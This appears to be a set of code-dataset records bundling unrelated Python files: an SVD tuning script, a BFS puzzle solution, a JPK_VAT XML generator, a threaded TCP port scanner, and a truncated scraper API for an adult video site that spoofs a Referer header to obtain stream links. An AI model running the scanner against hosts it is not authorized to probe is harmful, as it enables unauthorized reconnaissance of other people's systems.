validator.validate()\n\n scores.append(score)\n errors.append(std_error)\n\n plot_between(svd_dimension_values, scores, errors)\n \n plt.xlabel(\"N SVD dimensions\")\n plt.ylabel(\"Score\")\n plt.title(\"SVD research\")\n\n plt.savefig(\"figures/hyper/n_svd_dimensions.png\")\n \n if show:\n plt.show()\n else:\n plt.close()\n\n best_score_index = scores.index(max(scores))\n best_n_svd_dimensions = svd_dimension_values[best_score_index]\n best_score = scores[best_score_index]\n best_error = errors[best_score_index]\n \n logger.info(f\"Best N SVD dimensions {best_n_svd_dimensions}. Score {best_score} +- {best_error}\")\n return best_n_svd_dimensions\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Nickvs99/DataMining","sub_path":"Assignment 2/hyper_parameter_svd.py","file_name":"hyper_parameter_svd.py","file_ext":"py","file_size_in_byte":8696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70383699892","text":"from collections import deque\r\nimport heapq\r\n\r\ntime = 0\r\nsize = 2\r\neaten_fish_num = 0\r\n\r\nn = int(input())\r\nspace = [list(map(int, input().split())) for i in range(n)]\r\n\r\nfor y in range(n):\r\n for x in range(n):\r\n if space[y][x] == 9:\r\n start = (0, y, x)\r\n\r\ndef find_min(start, space, size):\r\n dirs = [(0, 1), (0, -1), (-1, 0), (1, 0)]\r\n queue = deque()\r\n queue.append(start)\r\n\r\n cnt, y, x = start # cnt = 다음 물고기를 먹는데 걸리는 시간 = 거리\r\n # 시작하는 위치의 값을 0으로 바꾸기\r\n space[y][x] = 0\r\n min_dist = [] # (cnt, y, x) 형태로 저장할 heapq\r\n visited = set()\r\n\r\n while queue:\r\n cnt, y, x = queue.popleft()\r\n visited.add((y, x))\r\n for dy, dx in dirs:\r\n ny, nx = y + dy, x + dx\r\n if 0 <= ny < n and 0 <= nx < n and (ny, nx) not in visited: # 공간의 범위 내에 있고 아직 방문하지 않았으면\r\n visited.add((ny, nx)) \r\n if space[ny][nx] == size or space[ny][nx] == 0: # 같은 크기의 물고기가 있거나 빈칸인 경우\r\n queue.append((cnt + 1, ny, nx))\r\n continue\r\n if space[ny][nx] > size: # 큰 물고기가 있으면 \r\n continue\r\n else: # 작은 크기의 물고기가 있으면\r\n heapq.heappush(min_dist, (cnt + 1, ny, nx))\r\n \r\n # 먹을 수 있는 가장 가까운 물고기 까지의 거리 정보\r\n if min_dist:\r\n return min_dist[0]\r\n else:\r\n return None # 식용 가능 물고기 x\r\n\r\nwhile True:\r\n next_dist = find_min(start, space, size)\r\n\r\n if next_dist is None:\r\n break\r\n cnt, y, x = next_dist\r\n time += cnt\r\n # 물고기 먹은 수와 상어의 크기 관계\r\n eaten_fish_num += 1\r\n if eaten_fish_num == size:\r\n eaten_fish_num = 0 # 초기화\r\n size += 1 # 크기 증가\r\n \r\n # 출발점 변경\r\n start = (0, y, x)\r\n\r\nprint(time)","repo_name":"armyants531/baejoon","sub_path":"백준/Gold/16236. 아기 상어/아기 상어.py","file_name":"아기 상어.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"23387452281","text":"#!/usr/bin/env python\n# -*- coding: windows-1250 -*-\n\nfrom pprint import pprint\nfrom lxml import etree as et\nfrom decimal import Decimal\nfrom os.path import abspath\nfrom tkinter import filedialog\nfrom tkinter import messagebox\nfrom tkinter import *\nfrom calendar import monthrange\n\nimport csv\nimport configparser\nimport os\nimport codecs\nimport time\nimport datetime\n\n#TODO obs³uga headerów w cfg\n\n__location__ = os.path.realpath(\n os.path.join(os.getcwd(), os.path.dirname(__file__)))\n\n\ndef mkWiersz(index, val, stawka):\n global root\n\n tns_ns = 'http://jpk.mf.gov.pl/wzor/2017/11/13/1113/'\n etd_ns = 'http://crd.gov.pl/xml/schematy/dziedzinowe/mf/2016/01/25/eD/DefinicjeTypy/'\n\n SprzedazWiersz = et.SubElement(root, et.QName(tns_ns, 'SprzedazWiersz'))\n\n LpSprzedazy = et.SubElement(SprzedazWiersz, et.QName(tns_ns, 'LpSprzedazy'))\n LpSprzedazy.text = str(index)\n\n NrKontrahenta = et.SubElement(SprzedazWiersz, et.QName(tns_ns, 'NrKontrahenta'))\n if len(val['NIP']) > 0:\n NrKontrahenta.text = val['NIP']\n else:\n NrKontrahenta.text = \"brak\"\n\n NazwaKontrahenta = et.SubElement(SprzedazWiersz, et.QName(tns_ns, 'NazwaKontrahenta'))\n NazwaKontrahenta.text = val['Klient']\n\n AdresKontrahenta = et.SubElement(SprzedazWiersz, et.QName(tns_ns, 'AdresKontrahenta'))\n AdresKontrahenta.text = val['Adres']\n\n DowodSprzedazy = et.SubElement(SprzedazWiersz, et.QName(tns_ns, 'DowodSprzedazy'))\n DowodSprzedazy.text = val['Numer faktury']\n\n DataWystawienia = et.SubElement(SprzedazWiersz, et.QName(tns_ns, 'DataWystawienia'))\n date = val['Data wystawienia'].split(' ')\n DataWystawienia.text = date[0]\n\n DataSprzedazy = et.SubElement(SprzedazWiersz, et.QName(tns_ns, 'DataSprzedazy'))\n date = val['Data sprzeda¿y'].split(' ')\n DataSprzedazy.text = date[0]\n\n if stawka == 23:\n K_19 = et.SubElement(SprzedazWiersz, et.QName(tns_ns, 'K_19'))\n K_19.text = val['Netto 23%'].replace(',', '.')\n\n K_20 = et.SubElement(SprzedazWiersz, et.QName(tns_ns, 'K_20'))\n K_20.text = val['VAT 23%'].replace(',', '.')\n\n if stawka == 8:\n K_17 = et.SubElement(SprzedazWiersz, et.QName(tns_ns, 'K_17'))\n K_17.text = val['Netto 8%'].replace(',', '.')\n\n K_18 = et.SubElement(SprzedazWiersz, et.QName(tns_ns, 'K_18'))\n K_18.text = val['VAT 8%'].replace(',', '.')\n\n\ndef mkheader(datex):\n global settings\n global root\n datex = datex.split('-')\n dateRange = monthrange(int(datex[0]), int(datex[1]))\n pprint(datex)\n pprint(dateRange)\n\n tns_ns = 'http://jpk.mf.gov.pl/wzor/2017/11/13/1113/'\n Naglowek = et.SubElement(root, et.QName(tns_ns, 'Naglowek'))\n\n KodFormularza = et.SubElement(Naglowek, et.QName(tns_ns, 'KodFormularza'))\n KodFormularza.text = 'JPK_VAT'\n KodFormularza.set('wersjaSchemy', '1-1')\n KodFormularza.set('kodSystemowy', 'JPK_VAT (3)')\n\n WariantFormularza = et.SubElement(Naglowek, et.QName(tns_ns, 'WariantFormularza'))\n WariantFormularza.text = '3'\n\n CelZlozenia = et.SubElement(Naglowek, et.QName(tns_ns, 'CelZlozenia'))\n CelZlozenia.text = settings.get('naglowek', 'celzlozenia')\n\n DataWytworzeniaJPK = et.SubElement(Naglowek, et.QName(tns_ns, 'DataWytworzeniaJPK'))\n DataWytworzeniaJPK.text = str(datetime.datetime.utcnow()).replace(' ', 'T') #yep, work around\n\n DataOd = et.SubElement(Naglowek, et.QName(tns_ns, 'DataOd'))\n DataOd.text = datetime.date(int(datex[0]), int(datex[1]), 1).strftime('%Y-%m-%d')\n\n DataDo = et.SubElement(Naglowek, et.QName(tns_ns, 'DataDo'))\n DataDo.text = datetime.date(int(datex[0]), int(datex[1]), dateRange[1]).strftime('%Y-%m-%d')\n\n NazwaSystemu = et.SubElement(Naglowek, et.QName(tns_ns, 'NazwaSystemu'))\n NazwaSystemu.text = settings.get('naglowek', 'nazwasystemu')\n\ndef mkpodmiot():\n tns_ns = 'http://jpk.mf.gov.pl/wzor/2017/11/13/1113/'\n Podmiot = et.SubElement(root, et.QName(tns_ns, 'Podmiot1'))\n\n NIP = et.SubElement(Podmiot, et.QName(tns_ns, 'NIP'))\n NIP.text = settings.get('podmiot', 'nip')\n\n PelnaNazwa = et.SubElement(Podmiot, et.QName(tns_ns, 'PelnaNazwa'))\n PelnaNazwa.text = settings.get('podmiot', 'pelna_nazwa')\n\n Email = et.SubElement(Podmiot, et.QName(tns_ns, 'Email'))\n Email.text = settings.get('podmiot', 'email')\n\n\n\ndef run():\n rows = [] # wszystkie rekordy z .csv\n podatek = Decimal() # suma ca³ego nale¿nego podatku\n global gui\n global root\n csvFilename = gui.csvFilename.get()\n\n try:\n with open(csvFilename, 'r', encoding='windows-1250') as csvfile:\n reader = csv.DictReader(csvfile, delimiter=';')\n for row in reader:\n rows.append(row)\n except Exception as e:\n messagebox.showerror('B³¹d', e)\n return -1\n\n namespaces = {\n 'tns': 'http://jpk.mf.gov.pl/wzor/2017/11/13/1113/',\n 'etd': 'http://crd.gov.pl/xml/schematy/dziedzinowe/mf/2016/01/25/eD/DefinicjeTypy/'\n }\n\n et.register_namespace('tns', 'http://jpk.mf.gov.pl/wzor/2017/11/13/1113/')\n et.register_namespace('etd', 'http://crd.gov.pl/xml/schematy/dziedzinowe/mf/2016/01/25/eD/DefinicjeTypy/')\n\n tns_ns = 'http://jpk.mf.gov.pl/wzor/2017/11/13/1113/'\n etd_ns = 'http://crd.gov.pl/xml/schematy/dziedzinowe/mf/2016/01/25/eD/DefinicjeTypy/'\n\n namespaces = {\n 'tns': tns_ns,\n 'etd': etd_ns\n }\n\n root = et.Element(\"{http://jpk.mf.gov.pl/wzor/2017/11/13/1113/}JPK\", nsmap=namespaces)\n mkheader(rows[1]['Data wystawienia'].split(' ')[0])\n mkpodmiot()\n\n index = 0\n for key, val in enumerate(rows):\n if val['Netto 23%'] != '0,00':\n index += 1\n mkWiersz(index, val, 23)\n\n if val['Netto 8%'] != '0,00':\n index += 1\n mkWiersz(index, val, 8)\n\n podatek += Decimal(val['Netto 8%'].replace(',', '.'))\n podatek += Decimal(val['Netto 23%'].replace(',', '.'))\n\n SprzedazCtrl = et.SubElement(root, et.QName(tns_ns, 'SprzedazCtrl'))\n LiczbaWierszySprzedazy = et.SubElement(SprzedazCtrl, et.QName(tns_ns, 'LiczbaWierszySprzedazy'))\n # LiczbaWierszySprzedazy.text = str(len(rows))\n LiczbaWierszySprzedazy.text = str(index)\n PodatekNalezny = et.SubElement(SprzedazCtrl, et.QName(tns_ns, 'PodatekNalezny'))\n PodatekNalezny.text = str(podatek)\n\n tree = et.ElementTree(root)\n # tree.write('jpk 0618.xml', pretty_print=True)\n # tree.write('jpk 0618.xml', pretty_print=True, encoding='cp1250')\n tree.write('jpk.xml', pretty_print=True, encoding='UTF-8')\n\n messagebox.showinfo('Gotowe', 'Skrypt zakoñczy³ dzia³anie, sprawdŸ poprawnoœæ pliku')\n\n\ndef browseCsv():\n global gui\n global settings, cfgfile\n\n path = settings.get('gui', 'lastpath')\n gui.csvFilename.set(filedialog.askopenfilename(initialdir=path, title=\"Select file\",\n filetypes=((\"csv files\", \"*.csv\"), (\"all files\", \"*.*\"))))\n\n path = os.sep.join(gui.csvFilename.get().split(os.sep)[0:-1])\n settings.set('gui', 'lastpath', path)\n savecfg()\n\n txt = gui.csvFilename.get().split(os.sep)\n CsvLabel.configure(text=txt[-1])\n\n\ndef savecfg():\n global settings\n with open(os.path.join(__location__, 'settings.ini'), 'w') as cfgfile:\n settings.write(cfgfile)\n\n\nif __name__ == '__main__':\n gui = Tk()\n gui.title('PyJPK3')\n gui.csvFilename = StringVar()\n # gui.grid_columnconfigure(2, weight=1)\n\n # with open(os.path.join(__location__, 'settings.ini'), 'w') as cfgfile:\n settings = configparser.ConfigParser()\n # settings._interpolation = configparser.ExtendedInterpolation()\n settings.read(os.path.join(__location__, 'settings.ini'))\n\n gui.minsize(300, 200)\n\n CsvLabel = Label(gui, text=gui.csvFilename.get())\n CsvLabel.grid(row=0, column=1, sticky=E)\n\n loadCsv = Button(gui, text=\"Wczytaj plik CSV\", command=browseCsv)\n loadCsv.grid(row=0, column=0, sticky=W)\n\n startBtn = Button(gui, text=\"Start\", command=run)\n startBtn.grid(row=3, column=0, sticky=W)\n\n # try:\n # config = configparser.ConfigParser()\n # config.read_file(codecs.open(abspath('pyjpk.cfg'), encoding='windows-1250'))\n # except Exception as e:\n # messagebox.showinfo(\"B³¹d\", e)\n\n mainloop()\n","repo_name":"d0nth4x/py-jpk-3","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8225,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19072738012","text":"# rebuild port_scanner.py\nimport socket\nimport threading\nimport sys\nfrom datetime import datetime\nimport platform\nimport subprocess\nfrom subprocess import PIPE, Popen\nimport banner as banner\n\n\ndef connect(ip, port, output):\n\t# create socket object\n\tobj = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n\tsocket.setdefaulttimeout(2)\n\ttry:\n\t\tobj.connect((ip, port))\n\t\toutput[port] = 'Open'\n\texcept:\n\t\toutput[port] = ''\n\n\n\ndef scan(host):\n\tthreads = [] # run connect() simultaenously\n\toutput = {}\t # for printing the output\n\n\ttime1 = datetime.now()\n\n\ttry:\n\t\t# create threads\n\t\tfor i in range(main.MAX_ports):\n\t\t\tt = threading.Thread(target=connect, args=(host, i, output))\n\t\t\tthreads.append(t)\n\t\n\t\t# start threads\n\t\tfor i in range(main.MAX_ports):\n\t\t\tthreads[i].start()\n\n\t\t# lock main thread until all threads finish\n\t\tfor i in range(main.MAX_ports):\n\t\t\tthreads[i].join()\n\n\t\tfor i in range(main.MAX_ports):\n\t\t\tif output[i] == 'Open':\n\t\t\t\ttry: # get the service name\n\t\t\t\t\tserv = socket.getservbyport(i)\n\t\t\t\texcept socket.error:\n\t\t\t\t\tserv = 'none'\n\t\t\t\tprint('[Hit] ' + host + ':' + str(i) + ' = ' \n\t\t\t\t\t+ output[i] + ' [*] SERVICE: ' + serv)\n\n\texcept KeyboardInterrupt:\n\t\tprint(\"\\n[Ign] Keyboard Interrupt -- Exiting...\")\n\t\tsys.exit()\n\texcept socket.gaierror:\n\t\tprint(\"\\n[Err] Hostname could not be resolved...\")\n\t\tsys.exit()\n\texcept socket.error:\n\t\tprint(\"\\n [Err] Server could not be reached...\")\n\t\tsys.exit()\n\t# How long it took to scan\n\ttime2 = datetime.now()\n\ttime_taken = time2 - time1\n\tprint(f\"[*] Time taken: {time_taken}\")\n\ndef main(ip):\n while True:\n # Clear the screen\n if platform.system() == \"Windows\":\n subprocess.call('cls', shell=True)\n main.MAX_ports = 1000\n else:\n subprocess.call('clear', shell=True)\n\n # check the limit of open file descriptors\n command = \"ulimit -n\"\n with Popen(command, stdout=PIPE, stderr=None, shell=True) as process:\n # store in a constant\n max_ports = int(process.communicate()[0].decode(\"utf-8\"))\n main.MAX_ports = max_ports - 100\n \n # DNS\n host = socket.gethostbyname(ip)\n banner.head()\n print(f'''\n[*] Scanning: {host}\n[*] # of ports to scan: {main.MAX_ports}\n[*] Please wait...\n''')\n scan(host)\n break\nif __name__ == \"__main__\":\n try:\n ip = sys.argv[1]\n main(ip)\n except IndexError:\n banner.usage()\n","repo_name":"prodseanb/portRecon","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"23621460678","text":"import re\nimport requests\nimport json\nfrom bs4 import BeautifulSoup\nfrom flask_restful import reqparse\nfrom flask import Blueprint, send_from_directory\nfrom requests.utils import requote_uri\nfrom config import ApiPath, UPLOAD_FOLDER\nfrom utils.lru_cache import timed_lru_cache\nfrom utils.messages import messages\nfrom settings import headers\nfrom utils.plyr import PlyrSource\n\nModuleTitle = \"Hentaiz\"\nModuleid = 'hentaiz'\nModulePath = Moduleid+'/'\nHentaizLink = 'https://hentaiz.org/'\nhentai = True\nModule = Blueprint(ModulePath, __name__)\n@Module.route(ApiPath+ModulePath, methods = ['post'])\ndef Page():\n\tparser = reqparse.RequestParser()\n\tparser.add_argument(\"page\")\n\tparams = parser.parse_args()\n\tdata = GetPage(params.get('page'))\n\tif data.get('status')!=200:\n\t\treturn data, data.get('status')\n\treturn json.dumps(data), data.get('status')\n@Module.route(ApiPath+ModulePath+'genres', methods = ['post', 'get'])\ndef GenresRequest():\n\tdata = GetGenres()\n\tif not data:\n\t\treturn {\n\t\t\t'status': 404,\n\t\t\t'message': messages.get('not_response'),\n\t\t}\n\treturn json.dumps({'data': data, 'status': 200})\n@Module.route(ApiPath+ModulePath+'title', methods = ['post'])\ndef TitleRequest():\n\tparser = reqparse.RequestParser()\n\tparser.add_argument(\"id\")\n\tparams = parser.parse_args()\n\tid = params.get('id')\n\tif not id:\n\t\treturn {\"message\":messages['no_param'].format('id'),'status': 400}\n\ttitle = GetTitleById(id)\n\treturn title, title.get('status')\n@Module.route(ApiPath+ModulePath+'video//')\ndef GetVideo(videoid,prelink):\n\tdata = GetVideoById(videoid,prelink)\n\tout = {\n\t\t'status': data.get('status'),\n\t}\n\tif data.get('status')==200:\n\t\tout['data'] = data.get('data')\n\telse:\n\t\tout['message'] = data.get('message')\n\treturn out, data.get('status')\n@Module.route(ApiPath+ModulePath+'genre', methods = ['post'])\ndef GenreRequest():\n\tparser = reqparse.RequestParser()\n\tparser.add_argument(\"genre\")\n\tparser.add_argument(\"page\")\n\tparams = parser.parse_args()\n\tgenre = params.get('genre')\n\tif not genre:\n\t\treturn \"Не передан параметр genre\", 400\n\tgenre = requote_uri(genre)\n\tgenres = GetGenres()\n\tfor key, val in genres.items():\n\t\tfor item in val['links']:\n\t\t\tif item[1].lower()==genre.lower():\n\t\t\t\tgenre_data = GetGenre(val.get('prelink')+\"/\"+item[1], params.get('page'))\n\t\t\t\tif genre_data.get('data'):\n\t\t\t\t\tgenre_data['data']['genre_name']=item[0].title()\n\t\t\t\treturn genre_data, genre_data.get('status')\n\tif genre.isdigit() and len(genre)==4:\n\t\tgenre_data = GetGenre(\"xfsearch/\"+genre+\"+год\", params.get('page'))\n\t\tif genre_data.get('status')!=200:\n\t\t\tgenre_data['message'] = 'Жанр не найден'\n\t\tif genre_data.get('data'):\n\t\t\tgenre_data['data']['genre_name']=genre\n\t\treturn genre_data, genre_data.get('status')\n\treturn {'message': 'Жанр не найден', 'status': 404}, 404\n@Module.route(ApiPath+ModulePath+'icon')\ndef icon():\n\treturn send_from_directory(UPLOAD_FOLDER, 'hentaiz.png')\n@Module.route(ApiPath+ModulePath+'search', methods = ['post'])\ndef SearchRequest():\n\tparser = reqparse.RequestParser()\n\tparser.add_argument(\"name\")\n\tparser.add_argument(\"page\")\n\tparams = parser.parse_args()\n\tname = params.get('name')\n\tpage = params.get('page')\n\tif page and not page.isdigit():\n\t\treturn \"Некорректная страница\", 404\n\tif not name:\n\t\treturn \"Не передан параметр name\", 400\n\treturn search(name, page)\n@timed_lru_cache(60*60)\ndef search(name, page):\n\tresponse = requests.post(HentaizLink+'index.php?do=search',params={'story':name, 'result_from': 1, 'full_search': 0, 'search_start': page or 1, 'subaction':'search', 'do': 'search'}, headers=headers)\n\tif response:\n\t\treturn GetTitles('', response.text)\n@timed_lru_cache(60*5)\ndef GetVideoById(videoid, prelink):\n\tsession = requests.Session()\n\tplayer_url = f'https://hentaiz.xyz/hub/{prelink}/list{prelink[0]}.php?id='+videoid\n\tresponse = session.get(player_url)\n\t# with open('video.html', \"w\", encoding=\"utf-8\") as f:\n\t# \tf.write(response.text)\n\t# \tf.close()\n\tif not response:\n\t\treturn {\n\t\t\t'status': response.status_code,\n\t\t\t'message': 'Ответ сервера не получен'\n\t\t}\n\tresponse = session.get(f'https://hentaiz.xyz/hub/{prelink}/fembed.php?id='+videoid, headers={'Referer': player_url})\n\tif response:\n\t\tp = next(re.finditer(r\"playerInstance\\.setup\\([\\s\\S]*?file: '(.*?)'[\\s\\S]*?image: '(.*?)'\", response.text), None)\n\t\tif not p:\n\t\t\treturn {\n\t\t\t\t'status': 404,\n\t\t\t\t'message': 'Ошибка получения ссылки',\n\t\t\t}\n\t\treturn {\n\t\t\t'status': 200,\n\t\t\t'data': PlyrSource(p.group(1),p.group(2))\n\t\t}\n\telse:\n\t\treturn {\n\t\t\t'status': 404,\n\t\t\t'message': messages.get('not_response'),\n\t\t}\n@timed_lru_cache(60*10)\ndef GetGenre(GenreUrl, page=None):\n\tUrl = HentaizLink+GenreUrl\n\tif page is not None:\n\t\tif not page.isdigit():\n\t\t\treturn {\"message\": messages['error_page_number'], 'status': 400}\n\t\tUrl+=f'/page/{page}/'\n\treturn GetTitles(Url)\n@timed_lru_cache(60*60*6)\ndef GetGenres():\n\tgenres = requests.get(HentaizLink+'tags/', headers=headers)\n\tyears = requests.get(HentaizLink+'years.html', headers=headers)\n\tgenres.encoding = 'utf8'\n\tyears.encoding = 'utf8'\n\tif years and genres:\n\t\tsoup_genres = BeautifulSoup(genres.text, 'lxml')\n\t\tsoup_years = BeautifulSoup(years.text, 'lxml')\n\t\tdata_genres = soup_genres.select('#dle-content')\n\t\tif not data_genres or not soup_years:\n\t\t\treturn {\n\t\t\t\t'status': 500,\n\t\t\t\t'message': 'Ошибка'\n\t\t\t}\n\t\ttags = data_genres[0].select('.clearfix.cloud-tags > span > a')\n\t\tyears = soup_years.select('.static-year-content > ul > a')\n\t\tcategory = soup_genres.select('.m-menu.to-mob.clearfix > li > a')\n\t\tif not tags or not years:\n\t\t\treturn \n\t\treturn {\n\t\t\t'category': {\n\t\t\t\t'links': [[i.text,i.get('href').split('/')[1]] for i in category if not i.get('class')][1:-1],\n\t\t\t\t'prelink': '',\n\t\t\t\t'name': 'Категория',\n\t\t\t},\n\t\t\t'genres': {\n\t\t\t\t'links': [[i.text, i.get('href').split('/')[-2]] for i in tags],\n\t\t\t\t'prelink': 'tags',\n\t\t\t\t'name': 'Жанр',\n\t\t\t},\n\t\t\t'years': {\n\t\t\t\t'links': [[i.text, i.get('href').split('/')[1]] for i in years],\n\t\t\t\t'prelink': '',\n\t\t\t\t'name': 'Год',\n\t\t\t},\n\t\t}\n\n@timed_lru_cache(60*10)\ndef GetPage(page):\n\tif page and not page.isdigit():\n\t\treturn {\n\t\t\t'status': 400,\n\t\t\t'message': messages.get('error_page_number'),\n\t\t}\n\treturn GetTitles(HentaizLink+(f'page/{page}' if page else ''))\ndef GetTitles(Url, html=None):\n\tif not html:\n\t\tresponse = requests.get(Url, headers=headers)\n\t\tresponse.encoding = 'utf8'\n\tif html or response:\n\t\tsoup = BeautifulSoup(response.text if not html else html, 'lxml')\n\t\tdata = soup.select('#dle-content')\n\t\tif not data:\n\t\t\treturn {\n\t\t\t\t'status': 500,\n\t\t\t\t'message': 'Ошибка'\n\t\t\t}\n\t\tdata = data[0]\n\t\toutdata = list()\n\t\ttitles = data.select('article.short.clearfix')\n\t\tif not titles:\n\t\t\treturn {\n\t\t\t\t'status': 404,\n\t\t\t\t'message': messages.get(404),\n\t\t\t}\n\t\tfor title in titles:\n\t\t\timgbox = title.select('a.short-poster.img-box')\n\t\t\timg = imgbox[0].select('img')[0].get('src')\n\t\t\ttitle_info = {\n\t\t\t\t'ru_title': title.select('.sh-title')[0].text,\n\t\t\t\t#en_title нет\n\t\t\t\t'id': title.select('.sh-desc > a')[0].get('href').split('/')[-1].split('.')[0],\n\t\t\t\t'poster': img if img.startswith('//') else HentaizLink[:-1]+img,\n\t\t\t\t'announce': bool(imgbox[0].select('.announce .announce-new')),\n\t\t\t\t'ongoing': bool(imgbox[0].select('.announce .announce-ongoing')),\n\t\t\t\t\n\t\t\t}\n\t\t\tinfo_blocks = list()\n\t\t\tfor i in imgbox[0].select('.short-meta.short-label'):\n\t\t\t\tif not i.text:\n\t\t\t\t\tcontinue\n\t\t\t\tif 'sl-y' in i.get('class'):\n\t\t\t\t\ttitle_info['series'] = i.text\n\t\t\t\telse:\n\t\t\t\t\tinfo_blocks.append(i.text)\n\t\t\tif info_blocks:\n\t\t\t\ttitle_info['info_blocks'] = info_blocks\n\t\t\t# info_blocks = [i.text if i.text]\n\t\t\t\n\t\t\t# orgtitle = title.select('.sh-orgtitle')\n\t\t\t# if orgtitle:\n\t\t\t# \tyear = orgtitle[0].text\n\t\t\t# \tif year[0]=='(' and year[-1]==')':\n\t\t\t# \t\ttitle_info['year'] = year[1:-1] # может быть несколько лет через тире по этому не int\n\t\t\t# \tif len(orgtitle)>1:\n\t\t\t# \t\ttitle_info['genre'] = [i.text for i in orgtitle[1].select('a')]\n\t\t# \tth_in = title.select('.th-in')\n\t\t# \tposter = th_in[0].select('.th-img > img')[0].get('data-src')\n\t\t# \ttitle_info = {\n\t\t# \t\t'poster': (poster if 'http' in poster else AnidubMirrorLink()+poster),\n\t\t# \t\t'id': LinkSplitter.join(th_in[0].get('href').split('/')[3:]).split('.')[0],#на конце кажой ссылки есть .html\n\t\t# \t}\n\t\t# \tru_title = th_in[1].select('.th-title')\n\t\t# \tif ru_title:\n\t\t# \t\tru_title_content = ru_title[0].text.split('[')\n\t\t# \t\tif len(ru_title_content)>1:\n\t\t# \t\t\ttitle_info['series'] = ru_title_content[-1][:-1]\n\t\t# \t\ttitle_info['ru_title'] = ' '.join(ru_title_content[0].split())\n\t\t# \ten_title = th_in[1].select('.th-subtitle')\n\t\t# \tif en_title:\n\t\t# \t\ttitle_info['en_title'] = ' '.join(en_title[0].text.split())\n\t\t\toutdata.append(title_info)\n\t\tpages = data.select('.navigation *')\n\t\treturn {\n\t\t\t'status': 200,\n\t\t\t'data': {\n\t\t\t\t'data': outdata,\n\t\t\t\t'horny': hentai,\n\t\t\t\t'pages': int(pages[-1].text) if pages else 1,\n\t\t\t\t'service_title': ModuleTitle,\n\t\t\t},\n\t\t}\n\telse:\n\t\treturn {\n\t\t\t'status': response.status_code if not html else 404,\n\t\t\t'message': messages.get('not_response'),\n\t\t}\n@timed_lru_cache(60*60)\ndef GetTitleById(title_id):\n\tresponse = requests.get(HentaizLink+title_id+'.html', headers=headers)\n\tresponse.encoding = 'utf8'\n\tif response:\n\t\t# with open('title.html', \"w\", encoding=\"utf-8\") as f:\n\t\t# \tf.write(response.text)\n\t\t# \tf.close()\n\t\tsoup = BeautifulSoup(response.text, 'lxml')\n\n\t\tdle_content = soup.select('#dle-content')\n\t\tif not dle_content:\n\t\t\treturn {\n\t\t\t\t'status': 500,\n\t\t\t\t'message': messages.get('error_parce')\n\t\t\t}\n\t\tout = {}\n\t\ttitle = soup.find(\"meta\", property=\"og:title\")\n\t\tif title:\n\t\t\tout['ru_title'] = title.get('content')\n\t\telse:\n\t\t\ttitle = dle_content[0].select('.fmain > .fheader > h1')\n\t\t\tif title:\n\t\t\t\tout['ru_title'] = title[0].text\n\t\tposter = dle_content[0].select('.fposter > img')\n\t\tif poster:\n\t\t\tout['poster'] = HentaizLink[:-1]+poster[0].get('src').replace('\\n', '')\n\t\tdescription = dle_content[0].select('#fdesc')\n\t\tif description:\n\t\t\tout['description'] = description[0].text\n\t\tseries = dle_content[0].select('.tab_content > .tabs > .series-btn > .s-link')\n\t\tout['series'] = {}\n\t\tif series:\n\t\t\tout_series = list()\n\t\t\tfor i in series:\n\t\t\t\tif 'vip.php' not in i.get('data-src'):\n\t\t\t\t\tlink = i.get('data-src').split('/')\n\t\t\t\t\tif 'hub' in link:\n\t\t\t\t\t\tout_series.append({\n\t\t\t\t\t\t\t'link':\"/\"+ModulePath+'video/'+link[link.index('hub')+1]+\"/\"+i.get('data-src').split('id=')[1],\n\t\t\t\t\t\t\t'name': i.text,\n\t\t\t\t\t\t})\n\t\t\tif out_series:\n\t\t\t\tout['series']['data'] = out_series\n\t\t\t\tfirst_splited_link = out_series[0]['link'].split('/')\n\t\t\t\tfirst = GetVideoById(first_splited_link[-1],first_splited_link[-2])\n\t\t\t\tif first.get('status')==200:\n\t\t\t\t\tfirst_data = first.get('data')\n\t\t\t\t\t\n\t\t\t\t\tfirst_data['name'] = out_series[0]['name']\n\t\t\t\t\tout['series']['data'][0] = first_data\n\t\t\t\tout['series']['direct_link']=False\n\t\telse:\n\t\t\tseries = dle_content[0].select('.embed-responsive > iframe')\n\t\t\tif series:\n\t\t\t\tsplited_link = series[0].get('src').split('/')\n\t\t\t\tepisode = GetVideoById(splited_link[-1].split('=')[-1],splited_link[-2])\n\t\t\t\tif episode.get('status')==200:\n\t\t\t\t\tepisode_data = episode.get('data')\n\t\t\t\t\tepisode_data['name'] = 'Видео'\n\t\t\t\t\tout['series']['data'] = [episode_data]\n\t\t\t\tout['series']['direct_link']=False\n\t\tfmright = dle_content[0].select('.fmright')\n\t\tif fmright:\n\t\t\tblocks = list()\n\t\t\tfor items_container in fmright[0].select('.flist > .flist-col > .vis'):\n\t\t\t\titems = items_container.select('* > span')\n\t\t\t\tvalue = list()\n\t\t\t\tif not items:\n\t\t\t\t\tcontinue\n\t\t\t\tif len(items)==1:\n\t\t\t\t\ttext_in_tag = items[0].text\n\t\t\t\t\ttext_after_tag = ' '.join(items[0].next_sibling.split())\n\t\t\t\t\tif text_in_tag == \"Релиз от:\":\n\t\t\t\t\t\tnumbs = next(re.finditer(r\"\\d{4}\", text_after_tag), None)\n\t\t\t\t\t\tif numbs:\n\t\t\t\t\t\t\tnumb = numbs.group(0)\n\t\t\t\t\t\t\tgenres = GetGenres()\n\t\t\t\t\t\t\tfor key, val in genres.items():\n\t\t\t\t\t\t\t\tfor item in val['links']:\n\t\t\t\t\t\t\t\t\tif item[1]==str(numb):\n\t\t\t\t\t\t\t\t\t\tout['year'] = [numb]*2\n\t\t\t\t\t\t\tif not out.get('year'):\n\t\t\t\t\t\t\t\tout['year'] = [numb]\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\telif text_in_tag == 'Эпизоды:':\n\t\t\t\t\t\tout['series']['info'] = [text_after_tag]\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\tvalue.append(text_in_tag)\n\t\t\t\t\tvalue.append([text_after_tag])\n\t\t\t\telse:\n\t\t\t\t\ttext = list()\n\t\t\t\t\ttag_name = items.pop(0).text\n\t\t\t\t\tif tag_name == 